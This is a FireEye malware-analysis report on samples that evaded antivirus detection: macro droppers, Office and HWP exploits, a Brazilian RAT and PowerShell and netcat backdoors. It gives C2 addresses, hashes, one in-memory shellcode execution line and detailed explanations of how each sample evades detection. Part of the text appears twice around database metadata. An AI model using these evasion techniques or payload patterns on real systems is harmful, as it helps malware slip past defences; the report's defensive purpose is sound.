The instructions are displayed in both English and Greek:\n\n\n\nFigure 14: Prompt to enable macros\n\nThe macro drops an encoded VBScript file named ocagent.vbe (69df0c3bab5e681c2e5eb5951a64776e), obtained from the data in a spreadsheet cell (see Figure 15), to C:\\octemp001\\ and executes it. The script connects to hxxp://0x5E469BFD, which is equivalent to hxxp://94.70.155.253, via the victim\u2019s web browser.\n\n\n\nFigure 15: Obfuscated script embedded in spreadsheet cell\n\nThe first stage Macro source code can be seen in Figure 16.\n\nFigure 16: Embedded VBA macro\n\nThe dropped ocagent.vbe VBScript is essentially a backdoor that connects to the CnC server at 94.70.155.253 to register the victim\u2019s computer and to obtain commands to run on the victim\u2019s machine.\n\n**Potential AV bypassing reason**\n\nThe following steps may be sufficient to bypass AV detection:\n\n1\\. Adding encoded VB script into a spreadsheet cell allows attackers to hide the malicious code.\n\n2\\. Representing the IP address in hexadecimal format may be sufficient to bypass regular expressions trying to match standard 32-bit IP addresses (dotted decimal notation).\n\n**6\\. dc15336e7e4579c9c04c6e4e1f11d3dd - **dedinho no cuzinho.rtf\n\nType: RTF \nDescription: RTF file with embedded executable \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: October 22, 2015 \nLast Submission: January 15, 2016 \nTime undetected in VT: At least 3 months\n\nIn this attack scenario, the victim receives an RTF document that appears to contain an embedded JPG image. The embedded file is actually an executable that attempts to hide its file extension by using a long sequence of underscore characters (e.g., Copy of foto.jpg<underscores>.exe (see Figure 17).\n\nFigure 17: RTF document with embedded file\n\nThe embedded binary (d409dc7e1ca0c86cb71e090591f16146) is packed with RLPack[8]. 
It drops a second Borland Delphi binary packed with a customized version of UPX, which will then drop the Spy-Net RAT on the system.\n\nSpy-Net[9] allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, run processes and services, capture images of the desktop, and record from the webcam and microphone. It also contains functionality to extract saved passwords and turn the victim into a proxy server. \n\nA beacon to dennyhacker[.]no-ip.org on TCP port 81 prepended with an ASCII representation of the length of the payload (33) and followed by a pipe and a new line character confirms Spy-Net activity:\n\n00000000 33 33 7c 0a 33|.\n\nThe RAT commands are translated to Portuguese to adapt the attack to Brazilian victims; some command examples are shown below (additional commands are listed in the Appendix):\n\nConfiguracoesdoserver = Server settings \nListarjanelas = List windows \nFinalizarconexao = End connection \nListarchaves = List keys\n\n**Potential AV bypassing reason**\n\n1\\. Packers are commonly used to obfuscate code in order to bypass traditional signature-based detection. The use of multiple files packed with two different packers may be sufficient to bypass detection.\n\n**7\\. b1f43ca11dcf9e60f230b9d6d332c479** \u2013 Book2 - Copy.xls\n\nType: XLSX \nDescription: VBA + Python Shellcode loader \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: September 20, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 6 months\n\nWhen opened, this Excel document appears to be blank but contains the VBA macro shown in Figure 18.\n\n\n\nFigure 18: VBA Macro with OLE Object\n\nThe macro will instantiate an OLE Object and load it via the xlVerbPrimary verb. 
The embedded OLE object contains two files:\n\n * python27.dll (md5 7e6dd0d7cb29103df4a592e364680075) - a legitimate file\n * file.exe (md5 73f16dbf535042bc40e9c663fe01c720) - a binary created with py2exe[10]\n\nOnce file.exe is executed, it launches a copy of the Windows calculator (calc.exe) as a decoy. However, behind the scenes it performs a Metasploit reverse TCP connect to a CnC server.\n\nThe unpacked version of file.exe is obfuscated Python that can be seen in Figure 19.\n\nFigure 19: Python Shellcode\n\nThe following steps describe the process in greater detail:\n\n * File.exe spawns a copy of calc.exe.\n * The embedded shellcode is Base64-decoded and AES-decrypted.\n * Via Python ctypes, the environment is set up to run the shellcode loader in memory.\n * The shellcode loader, which has been encoded with the Metasploit Shikata encoder,[11] is configured to connect to the host 31.168.144.18 on port 443.\n * The malware sleeps for 60 seconds and starts again.\n\n**Potential AV bypassing reason**\n\nMultiple tricks to evade detection can be seen here:\n\n 1. The file extension of the document is .xls. However, the file is actually an Open XML Format file (.xlsx). This simple trick may bypass extension-based parsers.\n 2. The embedded OLE object contains a legitimate binary (python27.dll), and the py2exe executable may itself appear to be a legitimate file.\n 3. The malicious Python script is packed using py2exe.\n 4. The embedded OLE object is extracted from a hidden Sheet3, so the VBA macro may not appear malicious.\n 5. The shellcode is Base64 encoded and AES encrypted.\n\n**8\\. 
95e89fd65a63e8442dcf06d4e768e8f1** \\- Doc1.docm\n\nType: DOCM \nDescription: VBA + PowerShell + Netcat as Backdoor \nAttribution: None \nCurrent detection: 0/53 \nFirst Submission: June 19, 2015 \nLast Submission: January 26, 2016 \nTime undetected in VT: At least 7 months\n\nThe Word document comes with a simple message shown in Figure 20.\n\nFigure 20: Message distractor\n\nWhen the VBA macro is executed (see Figure 21), PowerShell code is loaded from the document\u2019s comments (see Figure 22):\n\nFigure 21: Loading malicious code\n\nFigure 22: Code embedded in the document comments\n\nThe PowerShell script will act as a backdoor to allow remote access to the compromised machine. The script will download and execute netcat to listen on IP 192.168.52.129 and port 3724. Once a connection is received, a PowerShell shell will be sent (via the -e powershell.exe option) to the client (a PowerShell reverse shell), as shown in Figure 23.\n\nFigure 23: Malicious code content\n\nIt is interesting to note that attackers are moving from traditional command prompt shells (cmd.exe) to PowerShell shells (powershell.exe), which are actually more powerful. For example, PowerShell allows the use of WMI (Windows Management Instrumentation), something not readily accessible via the standard command prompt[12].\n\nThe script references a non-routable (RFC1918) IP address, so we suspect that the script was either a proof of concept or meant to be used during the lateral movement phase in a specific internal environment that uses this IP space.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the .docm extension may evade extension-based parsers.\n\n2\\. Embedding the PowerShell script in the document\u2019s comments and executing it from a VBA macro adds another layer of complexity. 
While this is clearly a suspicious behavior, it is not properly identified by signature-based detection.\n\nWe identified several other examples of malware using VBA Macros with PowerShell to mainly run shellcode loaders that allow attackers to gain remote access to victims\u2019 machines. Another example is shown below; it has two VT detections, but serves as an example of a very common variant seen in the wild.\n\n**9\\. 8de1ebacb72f3b23a8235cc66a6b6f68** \u2013 Polnoe_raspisanie_igr.xlsm\n\nType: XLSM \nDescription: VBA Macro + PowerShell \u2013 Shellcode Loader \nAttribution: None \nCurrent detection: 2/54 \nFirst Submission: October 14, 2015 \nLast Submission: January 28, 2016 \nTime undetected: 3.5 months with two generic detections\n\nWhen the Excel document is opened, a message is displayed in Russian. The user is even provided with a link to a legitimate article describing how to enable macros (see Figure 24).\n\nFigure 24: Excel file with legitimate link\n\nWhen the VBA Macro runs, it executes a PowerShell script that Base64-decodes and decompresses a second-stage PowerShell Script that will be used as the shellcode loader in memory (see Figure 25).\n\nFigure 25: PowerShell script being built on the fly via VB script\n\nPowerShell uses the Invoke-Expression (or IEX) call to execute the decompressed string, similar to the eval() functionality from other programming languages.\n\nThe Shellcode in this case comes hardcoded in the second stage PowerShell script, loaded and executed from memory with the following syntax:\n\n$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000\n\nWhere $x contains the Shellcode loaded in memory that eventually will connect to the domain spl[.]noip[.]me. 
Based on a DNSDB query, the domain **spl[.]noip[.]me** previously resolved to the Russian IP 81.23.177.72.\n\nMost of the VBA Macro + PowerShell scripts we identified were created with the macro_safe.py[13] and unicorn.py[14] scripts, often used for penetration testing.\n\n**Potential AV bypassing reason**\n\n1\\. The .xlsm extension may bypass extension-based parsers.\n\n2\\. Using the VBA macro in the first stage to build the first PowerShell script via string concatenation provides an easy way to bypass signature-based detection.\n\n3\\. The PowerShell scripts are Base64 encoded and compressed.\n\n**10\\. cda305a6a6c6ace02597881b01a116e3** - CVE-2013-1331-doc.docx\n\nType: DOCX \nDescription: Office Downloader \nAttribution: None \nCurrent detection: 0/55 \nFirst Submission: January 12, 2015 \nLast Submission: January 16, 2016 \nTime undetected in VT: The whole year and counting!\n\nIn 2013, a stack-based buffer overflow triggered while parsing PNG images was exploited in the wild against MS Office 2003 and Office for Mac. CVE-2013-1331 was assigned to the vulnerability.\n\nThe malicious samples did not include the PNG directly embedded in the document; rather, the PNG file was loaded from the Internet by using the INCLUDEPICTURE option[15].\n\nThis new sample uses a different feature of the Open XML Format, called \u201cRelationships\u201d, in order to download a resource from the Internet, as seen in Figure 26.\n\nFigure 26: XML content loading the PNG image remotely\n\nThe same domain was used back in 2013, but now with a different download technique. Although the vulnerability has been patched by Microsoft, the aforementioned technique can be used to download any resource from the Internet.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the XML \u2018Relationship\u2019 instead of the original INCLUDEPICTURE method to download resources from the Internet is a novel technique that may not be recognized.\n\n2\\. 
Based on the code shown above, it is clear that the intention is not to download a .gif image but a .php resource. Signature-based engines should easily detect the unusual resource name with multiple dots.\n\n##### **Conclusion**\n\nThreat actors of all types continue to improve their techniques to compromise organizations and remain undetected within an environment. Our study identified a number of techniques that successfully bypassed many AV engines:\n\n1\\. Alternate techniques to embed objects within Office documents that may not be recognized by AV engines.\n\n2\\. The use of a multi-stage infection approach in order to look unsuspicious at each stage:\n\na. A document downloading an image from the Internet that cannot be flagged as malicious at that stage \nb. A VBA Macro script loading malicious content from spreadsheet cells\n\n3\\. Multiple techniques to load malicious content from Office documents:\n\na. Embedded as ActiveX \nb. Embedded as OLE Binary \nc. Embedded in the document\u2019s comments \nd. Embedded in the spreadsheet cell\n\n4\\. Standalone packed binaries containing malicious Python scripts.\n\n5\\. Multi-layer Packing: RLPack + Custom UPX.\n\n6\\. The combination of multiple scripting languages to allow the attackers to obfuscate malicious code, such as VBA Script building malicious PowerShell scripts.\n\nIn several cases we note that the attackers are reusing known exploits (such as CVE-2015-5119 or CVE-2013-1331), but changing the delivery method; or leveraging obfuscation, encoding, encryption, or multiple layers of packing to disguise their malicious scripts or backdoors.\n\nFor proper detection, it is essential to monitor an attack through its entire life cycle \u2013 not simply when a suspicious document or file first enters a network. This approach is necessary to detect and block multi-stage infection strategies. 
While initial events (such as the delivery of a macro-enabled spreadsheet) may appear innocuous, eventually a later stage of the attack will trigger detection.\n\nIt is much easier to stop an attack \u2013 including a multi-stage attack \u2013 when it first occurs; this includes detecting known and unknown exploits (zero-days), and even threats that require user interaction, such as macros inside documents.\n\nThis detection approach is the core logic behind FireEye Multi-Vector Virtual Execution (MVX) technology.\n\n##### **APPENDIX**\n\n**Indicators of Compromise - IOCs**\n\nFigure 27 shows the MD5s with zero detection detailed in this report.\n\nFigure 27: 2015 samples from VT with zero detections in 2016\n\nSome exceptions to this study were added for samples with low detection rates but only generic detection (that is, not detected as part of any specific code family), that used an interesting technique, or that were suspected of being used by an APT group (see Figure 28).\n\nFigure 28: Samples with low and / or generic detection\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd** \u2013 Brazilian RAT\n\nSome interesting commands from the RAT in the Portuguese language:\n\n0002A3A8: pingtest \n0002A3BC: tentarnovamente \n0002A3E0: mouseposition \n0002A3F8: keyboardkey \n0002A40C: webcaminactive \n0002A424: webcamgetbuffer \n0002A43C: webcam \n0002A44C: desktop \n0002A45C: stopsearch \n0002A470: listarvalores \n0002A488: maininfo \n0002A49C: configuracoesdoserver \n0002A4BC: disconnect \n0002A4D0: uninstall \n0002A4E4: renameservidor \n0002A4FC: enviarexecnormal \n0002A518: enviarexechidden \n0002A534: executarcomandos \n0002A550: openweb \n0002A560: downexec \n0002A574: resumetransfer \n0002A58C: listardrives \n0002A5A4: listararquivos \n0002A5BC: execnormal \n0002A5D0: execinv \n0002A5E0: deletardir\n\n[1] Hangul Word Processor is a word processing application developed by South Korean software firm Hancom. \n[2] http://www.securityweek.com/zero-day-exploits-leaked-hacking-team-breach \n[3] https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html \n[4] https://msdn.microsoft.com/en-us/library/dd942138.aspx \n[5] An XLSB file is stored in binary format instead of the normal XML format, allowing the file to be read from and written to much faster. 
See https://technet.microsoft.com/en-us/library/dd797428.aspx \n[6] http://asec.ahnlab.com/1035 \n[7] https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf \n[8] http://www.pcworld.com/product/997528/rlpack-basic-edition.html \n[9] https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-could-the-curious-case-of-cz-solution.html \n[10] Py2Exe is a distutils extension to create standalone windows programs from python scripts. See https://sourceforge.net/projects/py2exe/. \n[11] https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb \n[12] http://www.howtogeek.com/163127/how-powershell-differs-from-the-windows-command-prompt/ \n[13] https://github.com/khr0x40sh/MacroShop/blob/master/macro_safe.py \n[14] https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py \n[15] http://blogs.technet.com/b/srd/archive/2013/06/11/ms13-051-get-out-of-my-office.aspx\n", "cvss3": {}, "published": "2016-04-13T13:00:00", "type": "fireeye", "title": "Ghosts in the Endpoint", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1331", "CVE-2015-5119"], "modified": "2016-04-13T13:00:00", "id": "FIREEYE:20039B16BD5AC80305D58731B238119A", "href": "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:18", "description": "We would like to introduce the first of our 
\u201cGhosts in the Endpoint\u201d series, a report prepared by FireEye Labs that documents malicious software not being detected in the wild by traditional signature-based detections.\n\nIn this study, all the families identified are samples from VirusTotal (VT) with zero detections, but detected as malicious by our Multi-Vector Virtual Execution (MVX) Engine. We also added a few samples with very low detection rates (VT <=3) but with interesting bypass techniques.\n\nOur goal is to share indicators that help the AV community and others improve their detection coverage.\n\n##### **Scope**\n\nSo far, only samples found in VT with the following file types were included in this study:\n\n * Win32 binaries\n * Office documents (including Open XML format)\n * RTF documents\n * Hangul Word Processor (HWP)[1] documents\n\nThe study includes samples submitted to VT in 2015 that were still found undetected or with minimal detection rates as of January 2016 (see the VT detection tables in the Appendix).\n\n##### **Findings**\n\nThe following samples were identified in our research:\n\n**Suspected APT malware:**\n\n 1. **GOODTIMES backdoor:** Suspected APT; MS Office with Embedded Hacking Team Flash Exploit\n 2. **UPS backdoor:** Suspected APT3\n 3. **VBA Macro + Metasploit Shellcode Loader:** Suspected Middle Eastern-based APT\n 4. **Hancom Office HWP Exploit:** Possible APT targeting of South Korea.\n\n**Malware without attribution:**\n\n 1. **OccultAgent:** (New) Code hidden in Excel spreadsheet\n 2. **Spy-Net RAT:** Targeting Brazilian victims\n 3. **VBA Macros + PowerShell scripts:** Netcat Backdoor\n 4. **VBA Macros + Python scripts:** Metasploit Shellcode Loader\n 5. **Office Downloader**\n\n##### **Detailed Sample Analysis**\n\nMalware that remains undetected by more than 56 different AV vendors over a long period of time is worth investigating. This section briefly describes the malware and techniques identified in the undetected samples. 
A full list of indicators can be found in the IOC section at the end.\n\n**1\\. 4b3858c8b35e964a5eb0e291ff69ced6** \\- 201507.xlsx\n\nType: XLSX \nDescription: CVE-2015-5119 (Flash exploit exposed in the Hacking Team leak) \nAttribution: Suspected APT threat group targeting Taiwan \nCurrent detection: 0/53 \nFirst Submission: July 13, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 6 months \n\n\nThis Excel document is PKZIP compressed (following the Open XML Format) with the structure shown in Figure 1:\n\n\n\nFigure 1: Structure of XLSX document\n\nWhen the spreadsheet is opened, a dialog prompts the victim to allow unknown embedded content to be played, as shown in Figure 2. In this case, social engineering is needed to convince the victim to execute the malicious Flash object.\n\n\n\nFigure 2: Excel document content and prompt\n\nWhen the victim allows the embedded content to be played, the activeX1.xml file is read to locate the OLE Control to be used (which corresponds to Macromedia Flash Player, as shown in Figure 3) through the ClassID attribute to finally load the Flash Exploit embedded in the activeX1.bin object.\n\n\n\nFigure 3: Content of activeX1.xml file\n\nThe embedded Flash exploit corresponds to CVE-2015-5119, one of several zero-day exploits identified following the Hacking Team leak in July 2015.[2]\n\nA look at the Flash Action Script (AS) reveals code similar to that from the Hacking Team Exploit, such as the class name exp1_fla/MainTimeLine, the function name TryExpl() with the same use-after-free technique, and even the same error message \u201ccan\u2019t cause UaF\u201d as shown in Figure 4.\n\n\n\nFigure 4: Flash exploit code\n\nThe combination of the class name exp1_fla() and classes ShellMac64, ShellWin32 and ShellWin64 built into the exploit (see Figure 5) were not observed in the original Hacking Team version of the exploit, suggesting that the group responsible for this malicious Excel file modified the 
original exploit code.\n\n\n\nFigure 5: Flash Action Script classes from malicious Excel file\n\nThe exploit drops a variant of the backdoor we call GOODTIMES (also known as Linopid). The backdoor communicates to Taiwan-based IP addresses 220.128.223.75 and 220.134.47.67 on ports 8080 and 443 via HTTP.\n\nWhile this particular GOODTIMES sample has not been attributed to a specific threat group, GOODTIMES has previously been used by suspected APT actors. Based on previously identified targets and the use of Traditional Chinese language and Taiwan-centric themes in spear phishing messages and decoy documents, the group appears to focus on Taiwanese targets.\n\n##### **Potential AV bypassing reason**\n\n1\\. New delivery mechanism: The leaked CVE-2015-5119 Flash exploit has been used by a wide range of threat groups, including other APT groups such as APT3 and APT18[3]. Previous delivery methods entailed luring the victim to click on a malicious link (delivered via a spear phishing message) where the malicious Flash exploit was hosted on a web page. In this case, the suspected APT group responsible for the GOODTIMES backdoor changed the **delivery mechanism** by embedding the exploit as ActiveX object inside the Excel Open XML Format (PKZIP compressed).\n\n2\\. In addition, while an ActiveX object would normally be embedded inside a Compound File Binary Format[4], in this case the uncompressed Flash content is embedded directly in the Excel file, right after the ClassID, as shown at Figure 6.\n\n\n\nFigure 6: Embedded Flash object\n\n\u00b7 The above steps might be enough to avoid proper parsing of the malicious Flash object. This is the first time we have seen a CVE-2015-5119 sample embedded in an Excel document this way.\n\n**2\\. 
22da029dd4e018b7c7135a03d0ba9b99**\n\nType: Win32 binary \nDescription: A variant of the UPS backdoor \nAttribution: suspected APT3 \nCurrent detection: 0/57 \nFirst Submission: August 6, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months\n\nUPS is a backdoor capable of uploading and downloading files, creating a reverse shell, reconfiguring itself to use different command and control (CnC) servers, and acting as a proxy server. It uses a custom binary protocol to communicate with its CnC server and it encrypts this custom protocol using a TLS TCP connection.\n\nWhile this particular UPS sample has not been attributed, UPS is commonly used by the China-based APT3.\n\n**Potential AV bypassing reason**\n\n1\\. Junk code insertion: Examining this UPS sample, we see a significant amount of \u201cjunk code\u201d potentially designed to mask the malicious nature of the binary, as well as to complicate analysis or reverse engineering efforts.\n\nIn Figure 7 we see the backdoor executing a jump to address 0x4043AB by forcing the \u201cjump if greater than\u201d comparison to be true by moving a large value (0x4A2E88E4) to the ebx register and then comparing it with a hardcoded lower value (0x6A1E839), after which a large number of junk instructions are skipped (red square). This strategy can be seen through several different execution paths.\n\n\n\nFigure 7: Decompiled UPS sample showing junk code\n\n**3\\. 
aedd5d8446cc12ddfdc426cca3ed8bf0** - S-old.xlsb\n\nType: XLSB \nDescription: VBA Macro + Metasploit Shellcode Loader Backdoor \nAttribution: Suspected Middle Eastern-based APT \nCurrent detection: 1/52 \nFirst Submission: September 28, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 4 months\n\nThis particular sample, an Excel Binary Workbook file,[5] has only one generic detection on VT, so we believe it is still worth mentioning in this report.\n\nWhen the spreadsheet is opened, the victim is shown a table of Israeli holidays and prompted to enable macros to view the full list, as shown in Figure 8:\n\nFigure 8: Malicious Excel file showing calendar data\n\nWhen the macro is executed it creates a Windows binary in memory as shown in Figure 9. Note that Chr(77) + Chr(90) builds the MS-DOS header magic number \u201cMZ\u201d.\n\nFigure 9: Macro concatenating bytes to form a Windows binary\n\nThe binary is written to the file system with the file name NTUSER.dat{**GUID**}.exe as shown in Figure 10.\n\nFigure 10: Creating the Windows binary\n\nIn this case, the GUID selected corresponds to the Scriptlet.TypeLib ActiveX object, creating the file name NTUSER.dat{FB9D87AE-8FEA-4583-98AB-2FB396EAB5FC}.exe (md5 6aab47b18afacbfa7423f09bd1fa6d25), which is later executed via the ShellExecute() API with the SW_HIDE parameter to run silently.\n\nFinally, the executable comes with an embedded Metasploit shellcode loader that connects to 84.11.146.62 on TCP port 13661.\n\nWhile this sample has not been attributed, similar techniques (use of XLSB files with embedded, obfuscated macros; creation of the file name NTUSER.dat{GUID}.exe; use of the binary to download additional malware) and the same CnC IP address have been referenced in reporting on a suspected Middle Eastern-based APT group known as \u201cRocket Kitten\u201d, primarily targeting Middle Eastern and European organizations.\n\n**Potential AV bypassing reason**\n\n1\\. 
The byte concatenation inside the VBA Macro, used to build a Win32 binary at runtime, helps to bypass signature-based detection.\n\n**4\\. 4e51143b01e99afc3bd908794d81d3cb** \nType: HWP \nDescription: Hancom Office HWP Exploit \nAttribution: None \nCurrent detection: 3/53 \nFirst Submission: July 31, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months with 3 generic detections\n\nThis sample, a Hangul Word Processor (HWP) document, has only three generic detections on VT, so we found it to be worth analyzing for this report.\n\nWhen opened, the HWP document displays Korean text and some photographs, as shown in Figure 11. Behind the scenes the document will exploit vulnerable versions of Hancom Office, dropping and executing a malicious file.\n\n\n\nFigure 11: Content of malicious HWP document\n\nInternally, the document structure includes three sections, where section 0 will trigger a Type Confusion vulnerability while parsing the content of the paragraph located at the data record structure HWPTAG_PARA_TEXT starting at offset 0x1C (see uncompressed section 0 at Figure 12). The logic bug will cause the string starting at offset 0x50 to be treated as a control structure. This control structure contains a fake object at offset 0x56 pointing to an address (0x0e0a0e0a) filled by a heap spray that eventually will redirect the execution flow to the shellcode.\n\n\n\nFigure 12: Section0 malformed paragraph\n\nA similar type confusion vulnerability has been previously documented by Ahnlab,[6] however, the vulnerability trigger is different.\n\nSection 2 has an uncompressed size equal to 112MB, used to perform the heap spray and expecting to place the shellcode at a memory address close to 0x0e040e04. In Figure 13, the beginning of the shellcode can be seen (uncompressed).\n\n\n\nFigure 13: Start of shellcode\n\nThe shellcode drops a file on disk and executes it via HncBLXX.HncShellExecute-> SHELL32.ShellExecute. 
This generates a connection to a compromised Korean automotive website and attempts to retrieve a file with a .JPG extension, which we suspect may be a second-stage binary. However, the file was no longer available on the website at the time of our analysis.\n\nThis particular sample has not been attributed to any threat group. However, the use of malicious HWP documents is notable, as that format is specific to a regional word processing program used heavily in South Korea and in particular by the South Korean government. While the use of malicious HWP files could simply indicate regional targeting by unspecified threat actors, similar exploits have been used in the past by suspected APT groups.\n\n**Potential AV bypassing reason**\n\n1\\. Heap spray technique change: Similar exploits used to be created with multiple large-size sections in order to spray the heap. This exploit fulfills the same purpose but with only one large-size section.\n\n2\\. Vulnerability triggered in a different format: A similar type confusion vulnerability described in this section was seen implemented in the Open XML Format (HWPX extension)[7], but this time ported to the Compound File Binary Format (HWP extension).\n\n**5\\. 497eddab53c07f4be1dc4a8c169261a5** \\- Barclays_Q22015_IMS_excel_tables.xlsm\n\nType: XLSM \nDescription: **VBA Macro + VBScript generated from spreadsheet** \nAttribution: None \nCurrent detection: 1/54 \nFirst Submission: July 08, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 7 months\n\nThis sample, an Excel macro-enabled file, has only one generic detection. The embedded macro creates an encoded Visual Basic (VBE) file that connects to a CnC site and allows remote control of the victim\u2019s computer. As we had not previously observed this backdoor, we named it OccultAgent.\n\nWhen the XLSM file is opened, the user is prompted to enable macros, as shown in Figure 14. 
The instructions are displayed in both English and Greek:\n\n\n\nFigure 14: Prompt to enable macros\n\nThe macro drops an encoded VBScript file named ocagent.vbe (69df0c3bab5e681c2e5eb5951a64776e), obtained from the data in a spreadsheet cell (see Figure 15), to C:\\octemp001\\ and executes it. The script connects to hxxp://0x5E469BFD, which is equivalent to hxxp://94.70.155.253, via the victim\u2019s web browser.\n\n\n\nFigure 15: Obfuscated script embedded in spreadsheet cell\n\nThe first stage Macro source code can be seen in Figure 16.\n\nFigure 16: Embedded VBA macro\n\nThe dropped ocagent.vbe VBScript is essentially a backdoor that connects to the CnC server at 94.70.155.253 to register the victim\u2019s computer and to obtain commands to run on the victim\u2019s machine.\n\n**Potential AV bypassing reason**\n\nThe following steps may be sufficient to bypass AV detection:\n\n1\\. Adding encoded VB script into a spreadsheet cell allows attackers to hide the malicious code.\n\n2\\. Representing the IP address in hexadecimal format may be sufficient to bypass regular expressions trying to match standard 32-bit IP addresses (dotted decimal notation).\n\n**6\\. dc15336e7e4579c9c04c6e4e1f11d3dd - **dedinho no cuzinho.rtf\n\nType: RTF \nDescription: RTF file with embedded executable \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: October 22, 2015 \nLast Submission: January 15, 2016 \nTime undetected in VT: At least 3 months\n\nIn this attack scenario, the victim receives an RTF document that appears to contain an embedded JPG image. The embedded file is actually an executable that attempts to hide its file extension by using a long sequence of underscore characters (e.g., Copy of foto.jpg<underscores>.exe (see Figure 17).\n\nFigure 17: RTF document with embedded file\n\nThe embedded binary (d409dc7e1ca0c86cb71e090591f16146) is packed with RLPack[8]. 
It drops a second Borland Delphi binary packed with a customized version of UPX, which will then drop the Spy-Net RAT on the system.\n\nSpy-Net[9] allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, run processes and services, capture images of the desktop, and record from the webcam and microphone. It also contains functionality to extract saved passwords and turn the victim into a proxy server. \n\nA beacon to dennyhacker[.]no-ip.org on TCP port 81 prepended with an ASCII representation of the length of the payload (33) and followed by a pipe and a new line character confirms Spy-Net activity:\n\n00000000 33 33 7c 0a 33|.\n\nThe RAT commands are translated to Portuguese to adapt the attack to Brazilian victims; some command examples are shown below (additional commands are listed in the Appendix):\n\nConfiguracoesdoserver = Server settings \nListarjanelas = List windows \nFinalizarconexao = End connection \nListarchaves = List keys\n\n**Potential AV bypassing reason**\n\n1\\. Packers are commonly used to obfuscate code in order to bypass traditional signature-based detection. The use of multiple files packed with two different packers may be sufficient to bypass detection.\n\n**7\\. b1f43ca11dcf9e60f230b9d6d332c479** \u2013 Book2 - Copy.xls\n\nType: XLSX \nDescription: VBA + Python Shellcode loader \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: September 20, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 6 months\n\nWhen opened, this Excel document appears to be blank but contains the VBA macro shown in Figure 18.\n\n\n\nFigure 18: VBA Macro with OLE Object\n\nThe macro will instantiate an OLE Object and load it via the xlVerbPrimary verb. 
The embedded OLE object contains two files:

 * python27.dll (md5 7e6dd0d7cb29103df4a592e364680075) - a legitimate file
 * file.exe (md5 73f16dbf535042bc40e9c663fe01c720) - a binary created with py2exe[10]

Once file.exe is executed it launches a copy of the Windows calculator (calc.exe) as a decoy. Behind the scenes, however, it performs a Metasploit reverse TCP connect to a CnC server.

The unpacked version of file.exe is obfuscated Python, shown in Figure 19.

Figure 19: Python Shellcode

The following steps describe the process in greater detail:

 * file.exe spawns a copy of calc.exe.
 * It Base64-decodes and AES-decrypts the embedded shellcode.
 * Via Python ctypes, the environment is set up to run the shellcode loader in memory.
 * The shellcode loader, encoded with the Metasploit Shikata Ga Nai encoder[11], is configured to connect to the host 31.168.144.18 on port 443.
 * The malware sleeps for 60 seconds and starts again.

**Potential AV bypassing reason**

Multiple tricks to evade detection can be seen here:

 1. The file extension of the document is .xls, but the file is actually an Office Open XML file (.xlsx). This simple trick may bypass extension-based parsers.
 2. The embedded OLE object contains a legitimate binary (python27.dll), and a py2exe executable may itself appear to be a legitimate file.
 3. The malicious Python script is packed using py2exe.
 4. The embedded OLE object is extracted from a hidden Sheet3, so the VBA macro may not appear malicious.
 5. The shellcode is Base64-encoded and AES-encrypted.

**8. 95e89fd65a63e8442dcf06d4e768e8f1** - Doc1.docm

Type: DOCM
Description: VBA + PowerShell + Netcat as backdoor
Attribution: None
Current detection: 0/53
First submission: June 19, 2015
Last submission: January 26, 2016
Time undetected in VT: At least 7 months

The Word document comes with a simple message, shown in Figure 20.

Figure 20: Message distractor

When the VBA macro is executed (see Figure 21), PowerShell code is loaded from the document's comments (see Figure 22):

Figure 21: Loading malicious code

Figure 22: Code embedded in the document comments

The PowerShell script acts as a backdoor to allow remote access to the compromised machine. It downloads and executes netcat to listen on IP 192.168.52.129, port 3724. Once a connection is received, a PowerShell shell is handed to the connecting client (via the -e powershell.exe option), as shown in Figure 23. Because netcat is listening for an inbound connection rather than calling out, this is strictly a PowerShell bind shell rather than a reverse shell.

Figure 23: Malicious code content

It is interesting to note that attackers are moving from traditional command prompt shells (cmd.exe) to PowerShell shells (powershell.exe), which are considerably more powerful. For example, PowerShell exposes WMI (Windows Management Instrumentation), something not readily accessible from the standard command prompt[12].

The script references a non-routable (RFC 1918) IP address, so we suspect that the script was either a proof of concept or meant to be used during the lateral movement phase in a specific internal environment that uses this address space.

**Potential AV bypassing reason**

1. Use of the .docm extension may evade extension-based parsers.

2. Embedding the PowerShell script in the document's comments and executing it from a VBA macro adds another layer of complexity.
While this is clearly suspicious behavior, it is not properly identified by signature-based detection.

We identified several other examples of malware using VBA macros with PowerShell, mainly to run shellcode loaders that give attackers remote access to victims' machines. Another example is shown below; it has two VT detections, but serves as an example of a very common variant seen in the wild.

**9. 8de1ebacb72f3b23a8235cc66a6b6f68** – Polnoe_raspisanie_igr.xlsm

Type: XLSM
Description: VBA macro + PowerShell – shellcode loader
Attribution: None
